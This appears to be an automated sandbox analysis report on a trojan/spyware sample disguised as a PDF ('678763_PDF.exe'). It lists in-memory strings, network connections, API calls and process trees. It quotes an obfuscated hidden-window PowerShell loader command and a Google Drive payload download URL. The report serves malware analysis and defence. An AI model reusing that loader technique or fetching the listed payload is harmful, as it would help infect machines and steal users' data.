Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D91000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004BDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004BF4000.00000004.00000020.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2944310987.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C&export=download
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/w
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C47000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228$
Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF6000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E4C000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CA8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021D1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E27000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E54000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021C83000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F2A000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF6000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E4C000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CA8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021D1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E27000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E54000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021C83000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F2A000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DC2000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49839 version: TLS 1.2

Source: C:\Users\user\Desktop\678763_PDF.exe

Code function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040571B

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: 678763_PDF.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Jump to dropped file

Source: C:\Users\user\Desktop\678763_PDF.exe	Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403532
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		6_2_00403532

Source: C:\Users\user\Desktop\678763_PDF.exe	Code function: 0_2_00406DC6	0_2_00406DC6
Source: C:\Users\user\Desktop\678763_PDF.exe	Code function: 0_2_0040759D	0_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00406DC6	6_2_00406DC6
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_0040759D	6_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_0015C19B	6_2_0015C19B
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_0015D278	6_2_0015D278
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00155362	6_2_00155362
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_0015C468	6_2_0015C468
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_0015C738	6_2_0015C738
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_0015E988	6_2_0015E988
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_001569A0	6_2_001569A0
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_001529E0	6_2_001529E0
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_0015CA08	6_2_0015CA08
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_0015CCD8	6_2_0015CCD8
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00159DE0	6_2_00159DE0
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_0015CFAC	6_2_0015CFAC
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00156FC8	6_2_00156FC8

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B

Source: 678763_PDF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/13@5/5

Source: C:\Users\user\Desktop\678763_PDF.exe	Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403532
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		6_2_00403532

Source: C:\Users\user\Desktop\678763_PDF.exe

Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049C7

Source: C:\Users\user\Desktop\678763_PDF.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\Desktop\678763_PDF.exe

File created: C:\Users\user\AppData\Roaming\erstatningsgraden

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03

Source: C:\Users\user\Desktop\678763_PDF.exe

File created: C:\Users\user\AppData\Local\Temp\nswBAC0.tmp

Jump to behavior

Source: 678763_PDF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\678763_PDF.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\678763_PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 678763_PDF.exe

ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\678763_PDF.exe

File read: C:\Users\user\Desktop\678763_PDF.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\678763_PDF.exe "C:\Users\user\Desktop\678763_PDF.exe"
Source: C:\Users\user\Desktop\678763_PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe "C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe"
Source: C:\Users\user\Desktop\678763_PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe "C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe"	Jump to behavior

Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\678763_PDF.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: sspicli.dll	Jump to behavior
